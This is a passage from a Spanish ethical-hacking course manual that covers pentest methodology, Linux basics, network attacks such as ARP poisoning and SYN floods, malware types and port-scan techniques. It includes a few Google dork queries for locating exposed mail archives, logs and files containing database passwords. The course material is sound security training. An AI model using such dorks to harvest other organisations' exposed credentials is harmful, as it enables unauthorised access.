Material de Ethical Hacking

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 104

CIBERTEC

DIRECCIN ACADMICA DE EXTENSIN PROFESIONAL


DIVISIN DE ALTA TECNOLOGA

Ethical Hacking

40 Horas
Todos los nombres propios de programas,
sistemas operativos, equipos hardware,
etc., que aparecen en este manual son
marcas registradas de sus respectivas
compaas u organizaciones.

Ethical Hacking

DATPr EthicalHacking 40H 15082014

CIBERTEC PERU SAC

Queda prohibida la reproduccin o transmisin total o parcial del contenido de la


presente obra en cualesquiera de sus formas, sean electrnicas o mecnicas, sin
el consentimiento previo y por escrito del editor
Copyright Todos los Derechos Reservados - Cibertec Per SAC

Programa : Ethical Hacking


Curso : Ethical Hacking
Duracin : 40 horas

SYLLABUS

I. DESCRIPCIN

Con el crecimiento exponencial de la Internet y su infraestructura, cada vez son ms las


organizaciones que apuestan por Internet como un medio, para brindar servicios a sus
clientes y guardar su informacin. En estos tiempos, la informacin es un activo primordial
para la organizacin y su modelo de negocio.

El Ethical Hacking es el proceso por el cual, se utilizan las mismas tcnicas y herramientas
de un atacante malicioso para atacar a una organizacin de una manera controlada; esta
filosofa resulta de la prctica probada: "para atrapar a un ladrn debes pensar como un
ladrn". El objetivo del Ethical Hacking es brindar ayuda a las organizaciones para que
tomen todas las medidas preventivas en contra de agresiones maliciosas, valindose para
ello, de los tests de intrusin, los cuales evalan la seguridad tcnica de los sistemas de
informacin, redes de datos, aplicaciones web, servidores expuestos, etc.

Pre-requisitos:
Conocimientos intermedios de redes
Conocimientos bsicos de programacin

II. OBJETIVO GENERAL

Al finalizar el curso, el alumno podr:

Identificar y describir cmo operan los hackers cuando atacan servidores y clientes,
a travs de Internet.
Realizar una prueba de penetracin.
Utilizar en forma prctica, las herramientas que se utilizan en un proceso de Ethical
Hacking.
Explicar la metodologa OSSTMM desarrollada por ISECOM, para realizar tests de
seguridad.
Describir cmo funcionan los ataques ms comunes que ocurren en Internet y por
consiguiente, cmo protegerse de ellos.
Explicar las ventajas del uso de la tecnologa y los peligros que se pueden generar si
no se tiene implementada una cultura de seguridad.

1
III. METODOLOGA

La metodologa ser expositiva y prctica; apoyada con laboratorios que han sido
diseados para complementar y afianzar el aprendizaje del curso. Los manuales y
diapositivas han sido desarrollados a la medida, y se utilizarn mediante los medios
multimedia, implementados en las aulas. A cada alumno se le asignar una computadora
con el software necesario.

Recursos:
Una computadora personal
Syllabus del curso
Material Educativo del curso

IV. EVALUACIN

Se rendir durante el curso, laboratorios calificados y se implementar un proyecto cuya


especificacin tcnica ser definida por el instructor del curso.
El promedio final ser obtenido mediante la siguiente frmula:

PF = 0.5*Promedio Laboratorios + 0.5*Examen Final

La nota mnima aprobatoria para el curso ser 14. (Calificacin vigesimal)

2
V. CONTENIDO ANALITICO

CAPTULO No. 1: Introduccin al Ethical


Duracin: 4 hrs.
Hacking
Objetivo: Reconocer y explicar el proceso del Ethical Hacking
Temas

Conceptos Bsicos
Historia de los Hackers
Tipos de Ethical Hacking
Etapas del Ethical Hacking
Metodologas de Evaluacin

Laboratorio No. 1:
Cuestionario de Preguntas
Discusin en clase

CAPTULO No. 2: Introduccin a Linux Duracin: 4 hrs.

Objetivo: Desenvolverse en una lnea de comandos del sistema operativo.


Temas

Introduccin
Consola de Linux
Sistema de Archivos
Instalacin de Software

Laboratorio No. 2:
Instalacin de software utilizando consola
Compilando cdigo C
Interpretando scripts perl, python, bash

CAPTULO No. 3: Seguridad en Protocolos TCP/IP Duracin: 6 hrs.

Objetivo: Entender el funcionamiento de los protocolos y sus deficiencias. Conocer el


funcionamiento del malware
Temas

Protocolos de la pila TCP/IP


Sniffing
Envenenamiento ARP
Denegacin de Servicio
Malware (Virus, Troyanos, Gusanos, Bombas Lgicas, Botnets, etc)

Laboratorio No. 3:
Capturando paquetes en la red con Wireshark
Envenenamiento ARP con Etterpcap y arpspoof

3
CAPTULO No. 4: Reconocimiento del Objetivo Duracin: 4 hrs.

Objetivo: Conocer el proceso de la etapa de reconocimiento del objetivo.


Temas

Introduccin
Google Hacking
Interrogacin DNS
Herramientas

Laboratorio No. 4:
Buscando informacin sensible con Google.
Herramientas host, dig, whois, SamSpade

CAPTULO No. 5: Scanning y Enumeracin Duracin: 7 hrs.

Objetivo: Comprender y realizar un escaneo de puertos.


Temas

Introduccin
Escaneo de Puertos y Enumeracin de Servicios
Nmap

Laboratorio No. 5:
Uso de herramientas de scanning.
RETO: Elevando privilegios en un servidor local.

CAPTULO No. 6: Anlisis de Vulnerabilidades Duracin: 5 hrs.

Objetivo: Comprender y realizar un anlisis de Vulnerabilidades


Temas

Introduccin
Analizadores a Nivel Plataforma
Analizadores a Nivel Aplicacin

Laboratorio No. 6:
Reconociendo vulnerabilidades a nivel plataforma con Nessus,NeXpose
Anlisis de Vulnerabilidades a nivel aplicacin.

CAPTULO No. 7: Inseguridad en Aplicaciones Web Duracin: 6 hrs.

Objetivo: Explotar vulnerabilidades en sistemas y aplicaciones.


Temas

Introduccin
Vulnerabiliaddes Web
Frameworks de Aprendizaje

Laboratorio No. 7:
Explotando vulnerabilidades Web (RFI, SQLi, LFI)
Atacame (Reto)

4
CAPTULO No. 8: Explotacin de Vulnerabilidades Duracin: 4 hrs.

Objetivo: Conocer las vulnerabilidades Web y cmo son explotadas.


Temas

Trabajando con Exploits


Metasploit Framework
La Navaja Suiza del Hacker
Password Cracking

Laboratorio No. 8:
Explotando vulnerabilidades con Metasploit
Consiguiendo una shell con Netcat

EVALUACIN FINAL Duracin: 1 hr.

VI. REFERENCIAS BIBLIOGRAFICAS Y VIRTUALES

Libros:

Penetration Testing And Network Defense. (2005). Cisco Press. United States of
America
Penetration Tester's Open Source Toolkit. (2007). Syngress. United States of America
The Web Application Hackers Handbook (2009). Wiley Publishing. United States of
America
Hacking Exposed 6th Edition. (2009). McGraw-Hill. United States of America
Google Hacking For Penetration Testers. (2005). Syngress. United States of America
Material Tcnico de Open-Sec.(2009) Per

5
oidiiddhufhahfofhjfhajos
Divisin de Alta Tecnologa
Ethical Hacking

1.0 Introduccin al Ethical Hacking

Contenido de Agenda

Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin

1
Divisin de Alta Tecnologa
Ethical Hacking

1.1. Origen de los Problemas de Seguridad

Debido a la creciente interconexin entre


los sistemas de informacin y las redes
digitales, existe un mayor rango de
ataque de personas no autorizadas, las
cuales pueden tener consecuencias
catastrficas para una organizacin.

1.2. Amenazas, Vulnerabilidades y Riesgos

2
Divisin de Alta Tecnologa
Ethical Hacking

1.3. Evolucin de Ataques

Manipulacin de Gusanos en
Paquetes / Spoofing Internet
Alto Anlisis Ocultos
DDoS
Sweepers Sofisticacin de las
Back Doors
Sniffers herramientas de los
Explotacin de O-day exploits
atacantes
vulnerabilidades
conocidas Deshabilitar
Programas auditoras
auto
replicados
Password Cracking
Conocimiento
tcnico
Adivinar requerido
Passwords

Bajo 1980 1990 2000+

1.4. Conceptos de Seguridad

Se puede entender como seguridad, al estado que define un activo basndose en 3


principios:

a) Confidencialidad: la informacin slo puede acceder a las personas


autorizadas para ello.

b) Integridad: la informacin ha de estar completa y correcta en todo


momento.

c) Disponibilidad: la informacin est lista para acceder a ella, por un usuario


vlido.

3
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin

2.1. Definicin del Hacker

Originalmente, el trmino hacker no tena


connotaciones negativas. Un hacker era
concebida como una persona con elevados
conocimientos y gran curiosidad, que
deseaba
aprender tanto como pueda sobre sistemas
informticos.

4
Divisin de Alta Tecnologa
Ethical Hacking

2.2. Los Primeros Hackers

a) PDP-1
b) MIT
c) Tech Model Railroad Club
d) ARPANET

2.3. Surgimiento de UNIX

a) Laboratorios Bell
b) Multics
c) C
d) USENET
e) Free Software Foundation
f) Linus Torvalds

5
Divisin de Alta Tecnologa
Ethical Hacking

2.4. Los Hackers Famosos

a) Kevin Mitnick
b) Adrian Lamo
c) Tsutomu Shimomura

2.5. Principales Clasificaciones

a) Hackers
b) Crackers
c) Lamers
d) Newbie
e) Phreakers
f) Cyber-Terrorist

6
Divisin de Alta Tecnologa
Ethical Hacking

2.6. Terminologa del Hacker

a) Trazabilidad
b) Autenticidad
c) Activo
d) Amenaza
e) Vulnerabilidad
f) Riesgo
g) Ataque

2.6. Terminologa del Hacker

El Hackeo tico es una herramienta defensiva que evala las


medidas de seguridad, simulando un intento de intrusin y que es
desarrollado antes de que ocurra un ataque para descubrir
vulnerabilidades.

7
Divisin de Alta Tecnologa
Ethical Hacking

2.6 Terminologa del Hacker

El Ethical Hacking es el proceso desarrollado en un


ambiente controlado, por el cual se utilizan las mismas
tcnicas y herramientas utilizadas por un atacante
malicioso, para vulnerar la seguridad de las redes de una
organizacin con el propsito de evaluar el estado de su
seguridad.

2.6. Terminologa del Hacker

Seguridad de la Informacin
Protege la informacin de un amplio espectro de amenazas, a efectos de
asegurar la continuidad y minimizar los daos a la empresa
maximizando el retorno de inversin.

Seguridad Informtica
Asegura los recursos del sistema de informacin (material informtico o
programas) de la empresa para ser utilizados de la manera en que se
decidi.

8
Divisin de Alta Tecnologa
Ethical Hacking

2.7. Estudios y Certificaciones

Contenido de Agenda

Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin

9
Divisin de Alta Tecnologa
Ethical Hacking

3.1. Evaluaciones del Ethical Hacking

Se organizan segn el conocimiento de los detalles de implementacin de


los consultores, sobre el sistema a ser evaluado. Segn esta mtrica, existen 3
tipos:

WHITEBOX BLACKBOX
GRAYBOX

3.2. Testeo de Seguridad de Internet

10
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin

4.1. Procesos del Ethical Hacking

a) Reconocimiento
b) Scanning
c) Conseguir Acceso
d) Mantener Acceso
e) Borrar Huellas

11
Divisin de Alta Tecnologa
Ethical Hacking

4.1. Procesos del Ethical Hacking

2
1

4
5
3

Contenido de Agenda

Conceptos bsicos
Historia de los Hackers
Tipos de Evaluacin
Etapas del Ethical Hacking
Metodologa de Evaluacin

12
Divisin de Alta Tecnologa
Ethical Hacking

5.1. Procedimiento de Evaluacin

5.2. Puntos de Evaluacin

a) Seguridad de la Informacin
b) Seguridad de los Procesos
c) Seguridad en las Tecnologas de Internet
d) Seguridad en las Comunicaciones
e) Seguridad Inalmbrica
f) Seguridad Fsica

13
Divisin de Alta Tecnologa
Ethical Hacking

Laboratorio n 1

Ejercicio 1:
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones
Tiempo Estimado: 15 minutos

14
Divisin de Alta Tecnologa
Ethical Hacking

2.0 Introduccin al Ethical Hacking Sistema Operativo Linux

Contenido de Agenda

Introduccin
Consola de Linux
Sistema de Archivos
Instalacin del Software

1
Divisin de Alta Tecnologa
Ethical Hacking

1.1. Qu es un Sistema Operativo?

Es un software que implementa una coleccin de rutinas que acta como


interfaz entre el hardware y los aplicativos utilizados por el usuario. Es
responsable de gestionar y coordinar el acceso al hardware para los
distintos aplicativos que se ejecutan.

1.2. Qu es un Sistema Informtico?

Es el conjunto de partes interrelacionadas, hardware, software y de recurso


humano. Un sistema informtico tpico emplea una computadora que usa
dispositivos programables para capturar, almacenar y procesar datos.

USUARIO 1 USUARIO 2 USUARIO 3 USUARIO N

PROGRAMAS DE APLICACIN
SISTEMA OPERATIVO
HARDWARE

2
Divisin de Alta Tecnologa
Ethical Hacking

1.3. GNU/Linux /Libertades Software Libre

GNU Linux
a) Poderoso y verstil S.O. de licencia libre
b) Ncleo (Linus Torvalds) combinado con sistema GNU
c) Desarrollo de la comunidad

Libertades Software Libre


a) Usar con cualquier propsito
b) Modificar y adaptarlo a necesidades
c) Distribuir copias
d) Licencia Pblica General GNU

1.4. Distribuciones

a) Ubuntu
b) RedHat
c) Fedora
d) Debian
e) Suse Enterprise
f) OpenSuse
g) Gentoo

3
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Introduccin
Consola de Linux
Sistema de Archivos
Instalacin del Software

2.1. Antecedentes

a) En Linux es frecuente la interaccin con la consola o lnea de comandos.


b) En modo grfico se presentan opciones dadas por el diseador, mientras
que en modo consola se tiene las funcionalidades creadas por el
programador.
c) La lnea de comandos permite ejecutar utilidades con mayor rapidez en
comparacin con la interfaz grfica y consumen menos recursos, ya que no
es necesario cargar libreras grficas.

4
Divisin de Alta Tecnologa
Ethical Hacking

2.1. Antecedentes

d) La mayora de las herramientas liberadas utilizadas para Ethical Hacking


estn diseadas para consola.
e) Es importante que una persona que desea realizar un proceso de Ethical
Hacking pueda desenvolverse cmodamente en la lnea de comandos del
sistema operativo Linux.

2.2. Comandos Bsicos

Los principales comandos GNU/Linux para consola son:

a) LS: lista ficheros de un directorio


b) PWD: visualiza el directorio actual
c) CD: cambia de directorio
d) MV: mover o renombrar ficheros
e) CP: copia ficheros
f) CAT: muestra en pantalla contenido del archivo
g) HED: muestra 10 primeras lneas del archivo
h) TAIL: muestra 10 ltimas lneas del archivo

5
Divisin de Alta Tecnologa
Ethical Hacking

2.3. Gestin de Usuarios

El GNU/Linux es multiusuario por lo que es necesaria la gestin de los


usuarios que harn uso del sistema. En un GNU/Linux hay usuarios normales,
sistema y ROOT. Los principales comandos son:

a) Useradd
b) Userdel
c) Passwd
d) Groups
e) Groupadd

2.4. Configuracin de Red

Para que un computador tenga conectividad y acceso a Internet se necesitar 3


cosas:
a) Direccin IP privada con su respectiva mscara de red
b) Puerta de enlace por donde se enviarn los paquetes
c) Servidores DNS para resolver dominios a conectarse

Ejemplo:
a) IFCONFIG eth0 192.168.1.30 netmask 255.255.255.0
b) ROUTE ADD DEFAULT gw 192.168.1.1
c) VI /ETC/RESOLV.CONF
d) NAMESERVER 8.8.8.8

6
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Introduccin
Consola de Linux
Sistema de Archivos
Instalacin del Software

3.1. Antecedentes y Comandos

En el momento de la instalacin, Linux crea una estructura de directorios


bsica, definida por Filesystem Hierarchy Standard Group, llamada Filesystem
Hierarchy Standard

7
Divisin de Alta Tecnologa
Ethical Hacking

3.1. Antecedentes y Comandos

3.2. Permisos del Sistema de Archivos

El sistema de permisos de GNU/Linux tiene un esquema de usuarios y grupos,


el cual se convierte en la base para la seguridad. A los usuarios y grupos se les
delega permisos sobre los archivos y directorios.
Los tipos de usuarios en Linux son:

a) Owner: usuario dueo de la carpeta o el archivo


b) Group: grupo de usuarios con permisos similares
c) Other: cualquier otro usuario

Los tipos de permiso son R(read), W(write) y X(execute)

8
Divisin de Alta Tecnologa
Ethical Hacking

3.2. Permisos del Sistema de Archivos

3.3. Listado de Comandos

9
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Introduccin
Consola de Linux
Sistema de Archivos
Instalacin del Software

4.1. Introduccin

a) En todo sistema se hace necesaria la instalacin de nuevo software que


aada nueva funcionalidad a la ya existente. Para GNU/Linux,
dependiendo de la distribucin, el software puede ser instalado de
varias maneras.
b) Es posible instalar software desde los repositorios propios de la
distribucin, a travs de paquetes y compilando el cdigo fuente.
c) Existen 2 aplicaciones que sirven para instalar el software, a travs de
lnea de comandos y desde los repositorios: APT-GET y APTITUDE.

10
Divisin de Alta Tecnologa
Ethical Hacking

4.2. Comando de Instalacin

a) APTITUDE install nombre paquete

b) APTITUDE install firefox

c) APTITUDE search firefox

d) APTITUDE remove firefox

e) APTITUDE show firefox

4.2. Comando de Instalacin

a) TAR xvzf fuente.tar.gz

b) CD fuente

c) ./CONFIGURE

d) MAKE

e) MAKE install (opcional)

11
Divisin de Alta Tecnologa
Ethical Hacking

4.3. Proceso de Instalacin

Laboratorio n 2

Ejercicio:
Tiempo: 30 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir, obtener valiosas conclusiones

12
Divisin de Alta Tecnologa
Ethical Hacking

3.0 Seguridad en Protocolos TCP/IP

Contenido de Agenda

Protocolos de la pila TCP/IP


Sniffing
Envenenamiento ARP
Denegacin de Servicio
Malware

1
Divisin de Alta Tecnologa
Ethical Hacking

1.1. Introduccin a Protocolos de Comunicacin

1.2. Qu es un Protocolo?

Un protocolo puede ser visto como un lenguaje que utilizan las computadoras
para comunicarse e intercambiar informacin entre s. Los protocolos
permiten que equipos con diferentes arquitecturas o sistemas operativos se
enlacen.

2
Divisin de Alta Tecnologa
Ethical Hacking

1.3. El Modelo OSI

1.4. El Modelo TCP/IP

3
Divisin de Alta Tecnologa
Ethical Hacking

1.4. El Modelo TCP/IP

1.4. El Modelo TCP/IP

a) Es un protocolo de red que implementa el mecanismo de entrega de


paquetes de datos.
b) No provee ningn mecanismo para determinar si un paquete alcanza su
destino o no, por eso se dice que no es orientado a conexin

4
Divisin de Alta Tecnologa
Ethical Hacking

1.5. Protocolo TCP (Transmission Control Protocol)

a) TCP es un protocolo que tiene un diseo orientado a la conexin y brinda


fiabilidad a la entrega de paquetes.
b) Las aplicaciones necesitan una comunicacin fiable y el IP no lo da, TCP
aade funciones necesarias para una comunicacin libre de errores y sin
prdidas.

Contenido de Agenda

Protocolos de la pila TCP/IP


Sniffing
Envenenamiento ARP
Denegacin de Servicio
Malware

5
Divisin de Alta Tecnologa
Ethical Hacking

2.1. Definicin

El sniffing (olfatear) es una tcnica que consiste en


monitorear el trfico de una red local, mediante cambios en
la configuracin de la tarjeta de red.

2.2. Wireshark

a) Es un analizador de paquetes de software libre utilizado para visualizar


el trfico que fluye en la red.
b) Identifica y soluciona los problemas de conectividad en una red, pero
tambin puede ser utilizado de forma maliciosa para conseguir
informacin confidencial.

6
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Protocolos de la pila TCP/IP


Sniffing
Envenenamiento ARP
Denegacin de Servicio
Malware

3.1. Definicin y Conceptos

a) Un switch es un equipo de
conectividad que trabaja en la capa
de enlace similar a un concentrador.

b) Un switch es capaz de analizar una


trama antes de enviarla por alguno
de sus puertos.

7
Divisin de Alta Tecnologa
Ethical Hacking

3.1. Definicin y Conceptos

c) Los switches trabajan mandando el trfico slo al segmento de red


donde se encuentra el host destino.
d) Esto debido a que los poseen las denominadas tablas CAM (memoria de
contenido direccionable), donde se almacena la informacin de las
direcciones MAC

3.2. Protocolo ARP

a) Es un analizador de paquetes de software libre utilizado para visualizar el


trfico que fluye por una red.
b) Se enva un paquete (ARP REQUEST) al broadcast y se espera que el
equipo responda (ARP REPLY) con la direccin MAC.

8
Divisin de Alta Tecnologa
Ethical Hacking

3.3. Causas del Envenenamiento ARP

a) Ausencia de autenticacin en el protocolo.


b) La tabla ARP est sujeta a alteraciones externas.
c) Puede enviarse mensajes ARP falsos.

3.4. Herramientas ARP

a) ARPSPOOF es una herramienta gratuita en modo consola que es


parte de la suite de tools llamando DSNIFF que permite implementar
ataques Man In The Middle enviando paquetes ARP falsos que
engaan a otros equipos dentro de una red local.
b) ETTERCAP es una herramienta de software libre, inicialmente fue
desarrollada tan slo como un analizador de paquetes pero que con
el proceso de desarrollo logr convertirse en una herramienta para
realizar ataques Man in the Middle.

9
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Protocolos de la pila TCP/IP


Sniffing
Envenenamiento ARP
Denegacin de Servicio
Malware

4.1. Introduccin

Un ataque de denegacin de
servicio, tambin llamado DoS
(Denial of Service) es un ataque a
un sistema de computadoras o red,
que causa que un servicio o recurso
sea inaccesible a los usuarios
legtimos.

10
Divisin de Alta Tecnologa
Ethical Hacking

4.2. Denegacin del Servicio

a) Consumo de los recursos computacionales: ancho de banda, espacio en


disco, tiempo de procesador .
b) Alteracin de informacin de configuracin: informacin de rutas de
encaminamiento .
c) Alteracin de la informacin del estado: interrupcin de sesiones TCP (TCP
reset).
d) Interrupcin de componentes fsicos de red.
e) Obstruccin de medios de comunicacin entre usuarios de un servicio y la
vctima.

4.3. Tipos de Ataque (Denegacin de Servicio)

a) DoS: este tipo de ataque se


caracterizan por tener un nico
origen desde el cual se realiza el
ataque.
b) Ddos: este tipo de ataque utiliza
varias fuentes para realizar un
ataque progresivo, rotatorio o
total en forma coordinada.
Normalmente, se asocia a una
campaa Botnet que infecta miles
de equipos con un malware.

11
Divisin de Alta Tecnologa
Ethical Hacking

4.4. Los Ataques ms Populares

Syn Flood

El cliente enva un paquete SYN, pero no responde al paquete ACK


ocasionando que el servidor permanezca a la escucha, un determinado
tiempo hasta cancelar la llamada.

4.4. Los Ataques ms Populares

ICMP Flood

Consiste en el envo de forma continua de un nmero elevado de


paquetes ICMP (Echo Request) de tamao considerable hacia la vctima
de forma que sta ha de responder con paquetes ICMP (Echo Reply), lo
que supone una sobrecarga, tanto en la red como en el sistema de la
vctima.

12
Divisin de Alta Tecnologa
Ethical Hacking

4.4. Los Ataques ms Populares

SMURF

Es una variante de ICMP Flood, por la cual el atacante enva grandes


cantidades de trfico ICMP (ping) a la direccin de broadcast de una
red, cambiando la direccin de origen (spoofing) por la direccin de la
vctima. Los equipos de la red recibirn los mensajes ICMP (echo request)
y lo respondern, multiplicando el trfico por cada host de la subred.

4.4. Los Ataques ms Populares

TEARDROP

El ataque Teardop se basa en introducir informacin de compensacin


falsa en los paquetes fragmentados. En consecuencia, durante el
reensamblado, quedan fragmentos vacos o superpuestos que pueden
desestabilizar el sistema.

13
Divisin de Alta Tecnologa
Ethical Hacking

Contenido de Agenda

Protocolos de la pila TCP/IP


Sniffing
Envenenamiento ARP
Denegacin de Servicio
Malware

5.1. Definicin

Es un tipo de software que tiene como objetivo


infiltrarse o daar una computadora sin el
consentimiento de su propietario.
El trmino malware incluye virus, gusanos,
troyanos, rootkits, spyware, entre otros.

14
Divisin de Alta Tecnologa
Ethical Hacking

5.2. Tipos de Malware

a) Troyano
b) Virus
c) Bomba Lgica
d) Botnet
e) Gusano
f) Keylogger
g) Stealer
h) Rootkit
i) Adware
j) Spyware
k) Backdoor

5.3. Medios de Infeccin

a) Portales Web Falsas


b) Pginas Web que explotan vulnerabilidades
c) Redes P2P
d) Vulnerabilidades
e) Correos Electrnicos
f) Medios de Almacenamiento

15
Divisin de Alta Tecnologa
Ethical Hacking

Laboratorio n 3

Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir, obtener valiosas conclusiones

16
Divisin de Alta Tecnologa
Ethical Hacking

4.0 Reconocimiento del Objetivo

Contenido de Agenda

Introduccin
Google Hacking
Interrogacin DNS
Herramientas

1
Divisin de Alta Tecnologa
Ethical Hacking

1.1. Antecedentes

1.1. Antecedentes

a) En inicio de un proceso de Ethical Hacking es el acercamiento para


conseguir informacin de la organizacin de manera pasiva.
b) Su objetivo principal es mapear la organizacin objetivo del mundo
real a un mundo virtual o ciberntico.
c) Se define mundo ciberntico, como un conjunto de direcciones IP
relevantes y alcanzables.

2
Divisin de Alta Tecnologa
Ethical Hacking

1.2. Principales Objetivos

a) Nombres de dominio
b) Direcciones IP
c) Informacin de registro (IP, Dominio)
d) Rangos de red
e) Proveedor de Internet
f) Tecnologas utilizadas
g) Arquitectura de Red
h) Informacin relevante

Contenido de Agenda

Introduccin
Google Hacking
Interrogacin DNS
Herramientas

3
Divisin de Alta Tecnologa
Ethical Hacking

2.1. Definicin y Conceptos

a) Los motores de bsqueda permiten encontrar cualquier cosa en Internet


(Page Rank, Deepbot, Freshbot)
b) Los operadores de bsqueda de Google son trminos de consulta que
realizan acciones especiales que permiten localizar de forma rpida y
precisa la informacin.
c) Los operadores de bsqueda ms utilizados para la tcnica Google
Hacking son:
Site: limita los resultados de la bsqueda al dominio.
Inurl: restringe resultado de bsqueda a las URL's.
Filetype: restringe el resultado a documentos.
Intitle: palabras en el ttulo de pginas HTML
Intext: palabras en el contenido de pginas HTML

2.1. Definicin y Conceptos

d) Google Hacking es una tcnica que utiliza a Google y su potencial para


encontrar informacin privada de la organizacin.
e) Con esta tcnica se consigue el perfil de una empresa en forma pasiva sin
utilizar tcnicas intrusivas sobre los servidores.

4
Divisin de Alta Tecnologa
Ethical Hacking

2.2. Operadores de Bsqueda

a) Lectura de mails confidenciales


filetype:mbx intext:Subject
intitle:index.of inbox

b) Logs de aplicaciones
ws_ftp filetype:log access
filetype:log

c) Ficheros con passwords


filetype:bak createobject sa
filetype:inc mysql_connect()

Contenido de Agenda

Introduccin
Google Hacking
Interrogacin DNS
Herramientas

5
Divisin de Alta Tecnologa
Ethical Hacking

3.1. Protocolo DNS

a) El protocolo DNS (Domain Name System) puede ser considerado como la


espina dorsal de Internet.
b) Es como una base de datos distribuida y jerrquica, que almacena toda
la informacin asociada a nombres del dominio.
c) Transferencia de Zona.

3.2. Tipos de Registros DNS

6
Divisin de Alta Tecnologa
Ethical Hacking

3.3. Software de Apoyo

Consola
a) Whois
b) Dig.
c) Host

Web
a) RIR
b) Netcraft (www.netcraft.com)
c) Clez (www.clez.net)

Contenido de Agenda

Introduccin
Google Hacking
Interrogacin DNS
Herramientas

7
Divisin de Alta Tecnologa
Ethical Hacking

4.1. Introduccin

El objetivo de la etapa de Reconocimiento


es encontrar toda la informacin posible
sobre la organizacin, antes de continuar
con la siguiente etapa.

4.2. Software de Reconocimiento

a) Wayback Machine (www.archive.org)


b) Fierce
c) Dnsmap
d) Metagoofil
e) TheHarverster

8
Divisin de Alta Tecnologa
Ethical Hacking

Laboratorio n 4

Ejercicio:
Tiempo: 60 minutos
Desarrolle el siguiente laboratorio e intercambie los resultados entre sus
compaeros, lo que le permitir obtener valiosas conclusiones.

9
oidiiddhufhahfofhjfhajos
Divisin de Alta Tecnologa
Ethical Hacking

5.0 Scanning y Enumeracin

Contenido de Agenda

Introduccin
Escaneo y Enumeracin
Nmap

1
Divisin de Alta Tecnologa
Ethical Hacking

1.1. Antecedentes

a) Una vez terminado el reconocimiento se tiene una lista de objetivos


pertenecientes a la organizacin adems de informacin relevante sobre
el objetivo.
b) El objetivo es descubrir puertos abiertos y servicios que se encuentran
funcionando en dichos puertos.
c) El atacante empieza a obtener ms informacin sobre el objetivo
realizando las siguientes acciones:
Reconocer equipos activos en el rango objetivo.
Descubrir servicios ejecutndose en los objetivos.
Identificar el sistema operativo.
Enumerar los servicios.

Contenido de Agenda

Introduccin
Escaneo y Enumeracin
Nmap

2
Divisin de Alta Tecnologa
Ethical Hacking

2.1. Conceptos Bsicos

Direccin IP

Es una direccin lgica de 32 bits que identifica de forma unvoca a un


equipo dentro de una red. Cuando uno se encuentra en una red local, sta
tendr dos pares de direcciones. Una direccin IP privada y otra pblica.

2.1. Conceptos Bsicos

Puerto

Es un nmero de 16 bits que puede estar entre 0 y 65535. Permite


establecer conexiones diferenciadas entre mquinas. Un puerto tiene 3
estados: abierto, cerrado y bloqueado.

3
Divisin de Alta Tecnologa
Ethical Hacking

2.1. Conceptos Bsicos

Socket

Es un concepto abstracto por el cual 2 aplicaciones situadas en


computadores distintas (o en la misma) pueden intercambiar un flujo de
datos. De manera ms tcnica, un socket es definido por una direccin IP,
un protocolo de transporte y un nmero de puerto.

2.1. Conceptos Bsicos

Socket

Toda conexin en Internet est identificada por un socket, es decir, una


mquina de origen (con su respectiva direccin IP) con su puerto, y una
mquina de destino con su puerto.

4
Divisin de Alta Tecnologa
Ethical Hacking

2.1. Conceptos Bsicos

Conexin TCP

El establecimiento de conexiones en TCP tiene un proceso prefijado y tiene


por finalidad, sincronizar los 2 host que participarn en la futura conexin. El
llamado three way handshake o saludo en tres vas.

2.2. Tipos de Escaneos

Ping Sweep

Consiste enviar un ECHO REQUEST a los equipos especificados en espera


de respuestas ECHO REPLY, para determinar qu equipos dentro de una
red se encuentran activos.

5
Divisin de Alta Tecnologa
Ethical Hacking

2.2. Tipos de Escaneos

TCP Connect

La tcnica consiste en realizar un saludo de 3 vas a cada uno de los


puertos del host escaneado. Este escaneo es el ms preciso; sin embargo,
su principal desventaja es el ruido que ocasiona lo hace ms fcil de
detectar por los firewalls.

2.2. Tipos de Escaneos

SYN Scan

Conocida como Half Open. Se enva un paquete SYN y espera respuesta.


Si un SYN/ACK retorna se toma como abierto, si RST retorna se toma como
cerrado y si no hay respuesta, se toma como filtrado.

6
Divisin de Alta Tecnologa
Ethical Hacking

2.2. Tipos de Escaneos

SYN Scan

La diferencia con TCP Connect, es que de estar abierto y recibir un


SYN/ACK, el equipo que escanea no responde con paquete ACK, sino que
enva un RST para terminar la conexin y evitar que el sistema lo registre
como un intento de conexin.

2.2. Tipos de Escaneos

NULL Scan

Este escaneo se basa en enviar un paquete malformado con todos los flags
TCP desactivados y esperar la respuesta. Segn el RFC 793, si un sistema
recibe un paquete hacia un puerto cerrado TCP, sin ningn flag activo,
deber responder con un RST.

7
Divisin de Alta Tecnologa
Ethical Hacking

2.2. Tipos de Escaneos

XMAS Scan

Este escaneo se basa en enviar un paquete TCP al sistema escaneado con


3 flags activos: URG, PSH y FIN. Los resultados son iguales a los de un Null
Scan: si la respuesta es RST, el puerto se encuentra cerrado y si no hay
respuesta, el puerto se encuentra o abierto o filtrado.

2.2. Tipos de Escaneos

FIN Scan

El escaneo FIN consiste en enviar un paquete TCP al puerto escaneado con


el flag FIN activo. Es conocido como el stealth scan (escaneo silencioso)
dado que es el escaneo ms discreto que existe. El puerto se determinar
abierto o cerrado segn la respuesta al igual que los 2 escaneos anteriores.

8
Divisin de Alta Tecnologa
Ethical Hacking

2.2. Tipos de Escaneos

UPD Scan

Las tcnicas anteriores se basan en el escaneo de servicios que utilicen el


